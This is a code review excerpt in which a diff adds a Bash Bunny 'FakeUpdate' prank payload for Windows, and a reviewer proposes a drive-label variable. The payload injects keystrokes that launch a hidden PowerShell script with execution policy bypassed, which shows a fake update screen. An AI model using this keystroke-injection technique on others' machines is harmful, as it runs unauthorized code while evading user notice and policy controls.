payloads/library/prank/FakeUpdate/payload.txt

```diff
@@ -0,0 +1,23 @@
+#!/bin/bash
+#
+# Title:         FakeUpdate
+# Author:        jOte-
+# Version:       1.0
+# Target:        Windows
+#
+# Same as fakeupdate.net but local and single file.
+# Opens IE in kiosk mode and show fake update.
+# ALT-F4 to close
+#
+# Blue   --- Setup
+# Green  --- Done
+
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+Q GUI r
+Q DELAY 100
+Q STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\webserver.ps1')"

```

Comment:
I would add a Bash variable at the start of the payload defining drive label, since people might not be using the default label name `BashBunny` . For example, 

```
Drive_Label="BashBunny"

Q STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''$Drive_Label''').Name+'payloads\\$SWITCH_POSITION\webserver.ps1')"
```

This allows for easy user configuration.